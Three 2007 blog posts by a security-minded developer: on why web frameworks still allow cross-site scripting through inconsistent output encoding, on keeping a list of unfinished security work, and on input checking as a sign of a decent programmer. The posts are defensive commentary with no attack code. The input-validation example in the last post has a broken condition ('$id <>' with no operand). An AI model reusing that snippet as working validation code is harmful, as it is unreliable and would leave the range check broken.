Saturday, December 29, 2007

Why is XSS still a problem?


For all of the non-security people who read this blog there is an attack vector called Cross-Site Scripting (XSS).  I won't get into the details but the main reason it is useful is because an attacker can run their code as you.  Why is that bad?  For many reasons they could:
- Steal your login session 
- Make requests as you (e.g. Transfer $1,000 to evil account)
- And on and on and on :)

The point of my post is this.  Why is XSS is even still around except for corner cases?  In other words why haven't the frameworks made it hard for a developer to create an XSS?  XSS happens for only one reason, poor output encoding, period.  I agree output encoding can be tricky on weird edge cases but even then the question might not be poor output coding but rather poor coding.  

This question has been on my mind for the past few weeks.  I think I have narrowed it down to a few reasons:
1) Frameworks are too scared to make this change because it would bust existing web applications
2) Frameworks expect it is up to the developer to do proper output encoding
3) The framework developers don't know any better

Since the third one has a simple solution (educate or fire the developers) I will only focus on the first two.  

Frameworks are too scared to make this change because it would bust existing web applications. This case would only happen when there is an existing framework and we wanted to retro-fit uniform output encoding across the board.  My example for this is the .Net framework.  .Net is a decent framework and I can't knock it. However, the output encoding is not uniform allowing developers to easily screw up having a developer remember the difference between 20+ web controls and the variations depending on the property used.  While it is possible to remember all of this, remembering it while your boss is yelling at you to get the feature down by 5PM or else your arse is out of there could be an issue :).  The .Net framework just release v3 and it seems even more solid and polished but still encoding is not uniform.  Why though?  My guess is because that if they broke how the controls operated developers would break out the pitchforks and storm Redmond, WA.  I can understand this because everyone loves to beat-up on MS but boy I would love to see this change.  

Another example is Ruby On Rails(RoR).  They recently released 2.0 my own little application had a few things busted from the new version because RoR is known for being on the leading edge and trying to remove cruft and always doing the best thing for the framework.  If the devs have to work a bit harder so be it.  I am sure there are other examples but these are the ones I thought of.  

How could we fix the .Net framework and not have it bust existing web applications?  How about having a configuration value that says we should encode everything or not?  Maybe "LegacyEncoding" could be the configuration name.  Have it set to false by default but if someone wanted to turn it on let them hang themselves.  

Frameworks expect it is up to the developer to do proper output encoding. Boy I love this reason.  Yes, there are quite a few good web developers out there that understand proper output encoding and when and why we need to set a charset and everything else.  However, there are even more developers out there that have no clue.  I wish this was not the case but my experience has shown me otherwise.  Sure, a framework initially might be adopted only by the l33t coders who know all of this stuff correctly and you can point your tongue out at me and say "nah-nah-nah you are wrong so pooh on you" but eventually the non-l33t coders will come and then there will be issues.  At this point you will have the first issue I pointed out if you didn't do proper output encoding from the beginning. 

One example is once again with RoR - I apologize for all the RoR examples but I am a bit enamored at the moment with that framework - by default doing SQL is through methods and all examples show parameterized queries, etc....  If you ever see dynamic SQL you will see warnings about it being bad, leads to possible security issues and is a code smell.  Great!  Why?  Because there are these attacks called SQL injections that were/are fairly common and can wreak havoc on database-backed systems.  RoR is a good example of making it hard  to do something that is known to be bad when there is a better alternative to it.  

Another example is Visual Studio and its warnings/errors when you use certain C++ methods that have safer alternatives out there.  This allows the user not to hang themselves with system calls that are known to lead to certain types of attacks.  

I think it would be possible to have a set of controls and/or framework that by default output encoded everything.  If you wanted something not output encoded you would have to think of doing it instead of the other way around.  Would this solve all XSS?  Heavens no, but, as I said earlier if we can kill out 80+% of the issues that would go a long way.  

Thursday, December 13, 2007

Where is the security debt?


In development there is a term technical debt, which basically means that there are bits and pieces left over from the development that need to be finished. It could be some refactoring on a messy class, a hacky implementation, missing functionality, etc... I think we also need to use this same idea in security. I know when we boil it all down it could be put under technical debit, however, I think security should be in its own category as that has a different impact than a poorly written class...well most of the time :).

Just like in development when securing a product the cost of doing the work vs. the risk of an incident occurring has to be weighed to come up with a business case for doing the work. On top of that there is a schedule that needs to be adhered to. What this means is not all of the security work and/or testing gets done. I have seen this for many products and I still do see it on applications I use throughout the day (just monitor any vulnerability web site and you will see what I am talking about). However, I hardly see a list of things that still need to be done or as I like to think about it a debt sheet. When the next iteration of the software or when maintenance is going to be done on an area that also has some security work, the security work should be bundled into it to whittle down the debt.

I would think in a perfect world the following scenario would happen:
1) A product is built and security is done and a list of things done and things that still need to be done is kept in a central location.
2) Once the product is finished security personnel goes through the list of things not done and removes items that are no longer valid (threat landscape has changed, it has been fixed by something else, etc...)
3) When the next version / iteration is being built this list is shown and it is gone through again and any cruft is removed. After that the remaining debt is put into things that need to be planned for.
4) Repeat steps 2 and 3 for each product iteration until no security stuff needs to be done (yea right!).

Sunday, December 02, 2007

One metric of a decent programmer


There are many many many metrics for figuring out if a person who can program is in any way decent.  One thing I look for when reading people's production code is how trusting they are.  Since I work in security this is something I look at from that perspective but I also think that if you want to program well you just can't trust data, period.  

Now the few people who have read my code know I don't always do this.  Why?  Well there are two reasons:
1) I never claimed I am a decent coder 
2) It is tedious work to always check your inputs 

However, I have seen some decent code and when I do they tend not to trust anything.  What does that mean?  It means you are stating the pre-conditions of your code and then checking them, be it asserts, validation checks or contracts.  

For example lets say you are expecting an ID to be passed in between the ranges of 1 and 100 the code should look like.
// Description: This is a test method
// Pre-condition: We expect an id between 1 and 100 to be passed in 
// 
// Post-condition: Our work is done
// 
// Parameters:
//    id = The id we need to use for the lookup
function junkFunction($id) {
  // Do our pre-condition check
  if(($id <>
      ($id > 100)) {
    // return error code or throw an exception
  }

  // do work since pre-conditions checked out and return
}

Why is this good?  Because there will be a smaller chance that low-hanging bugs will not surface and on top of that the programmer has to THINK more about what he is doing.  Sure it might not be as fast but most of the time that does not matter (plus performance should be done after the code is initially working and not any time before that).  

Why do I overall think this should be a metric of a decent programmer?  Because I think good programmers realize that other people (or their future selfs) will eventually look or use their code.  They can't always trust what is going to be passed in will match with the assumptions used when writing the code.  I also think it shows that the coder was actually thinking about what the function was supposed to be doing and not just doing what they were told what the function was supposed to do.  What does this mean?  It means they have to understand the business or user needs.  

Once again this isn't the one and only metric, just one that I think should be used when evaluating all coders.